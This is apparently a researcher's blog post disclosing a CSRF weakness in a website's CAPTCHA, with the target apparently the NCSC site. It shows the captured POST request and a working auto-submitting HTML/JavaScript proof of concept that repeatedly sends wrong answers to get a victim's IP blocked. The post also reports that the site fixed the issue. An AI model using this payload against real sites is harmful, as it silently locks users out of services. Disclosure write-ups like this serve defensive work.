Blocking Access to via CSRF

I spidered the website... and was shortly met with this:
How Rude.

I thought: Hmm, 5 requests? Looks like a home-made CAPTCHA... let me take a look.

I know NCSC are better than that.

The Problem

This isn't a huge issue, but it's worth highlighting just because it's NCSC: lead by example and all that.

This is what the CAPTCHA submission looks like...

POST /captcha_resp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Cookie: BNIS_x-bni-jas=zpZf1re4sUBSMhU-9cca4FYNM8-HX9qeqxfEjcJ8vKU=; AWSELB=AB19F9210C0AF8A76886DB45AF60D61D2095B2F380E4FD79F740F206063DDFC9EFC95BC5411F8E2B32716592E805CE4F4BF753668E91C642E6B47DAD63074B3525806A5E91; has_js=1; _pk_id.4.131f=f9f43afcecd36885.1478612347.1.1478612497.1478612347.; _pk_ses.4.131f=*; cookie-agreed=2; x-bni-ci=N3UI-a8CH74VKK-1_vOOIlnF9pDByL4tYEJtZUuXypWCq7rF1hDLUA==
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

captcha_resp_txt=aaxsx
In case you missed it, captcha_resp_txt=aaxsx is the problem here: the request carries no per-session token or any other control to make it unique, so it can be replayed blindly. That means we can build a CSRF page that submits 'something' on load, then reloads itself two seconds later, creating a loop in the victim's browser. After a certain number of failed attempts by the unsuspecting user, they will be blocked within a matter of seconds. Jolly bad.

The Payload

This will automatically send the wrong CAPTCHA answer on load, then two seconds later reload the page to send the wrong data again, over and over, locking the user out for failing to submit the right challenge. This can happen in the background, entirely unnoticed by the user. However you choose to deliver the CSRF attack, the fix is still the same.

For this I used Burp Suite Pro's CSRF PoC generator, with auto-submit on load and a two-second refresh of the page using the meta tag: a very basic loop, for my very basic coding skills.

  <html>
    <head>
      <meta http-equiv="refresh" content="2" />
    </head>
    <body>
      <script>
        // Burp's generated PoC, tidied up; the target URL is redacted here.
        function submitRequest() {
          var xhr = new XMLHttpRequest();
          xhr.open("POST", "", true);
          xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
          xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
          xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
          xhr.withCredentials = true;
          var body = "captcha_resp_txt=n0x00";
          var aBody = new Uint8Array(body.length);
          for (var i = 0; i < aBody.length; i++)
            aBody[i] = body.charCodeAt(i);
          xhr.send(new Blob([aBody]));
        }
        // Auto-submit on load; the meta refresh re-runs this every 2 seconds.
        submitRequest();
      </script>
    </body>
  </html>


Below you can see in my Chrome browser that the site now claims to be down for maintenance. But accessing the same address via Google Translate, which behaves as a transparent proxy and fetches the pages for me, I can see it's not down for maintenance at all: that "maintenance" page is a rule blocking my IP address on the network for having failed to satisfy the CAPTCHA's requirements.

Fixed!

The web team turned this around super quick: judging by the new cookies, they rolled out Cloudflare, which affords them all the controls and defences Cloudflare has to offer. Good move. I'm not sure there is a non-commercial tool or method that can parallel this for those without a budget for defence, but Cloudflare is good, discouraging for attackers, and easy to use... I'll shut up because I'm sounding like a salesman.



I asked NCSC: "What is the NCSC's stance on vulnerability disclosure of issues on their site? (and others?)" I'm not sure they are in a position to answer, but if they are, it would be good to hear what they say.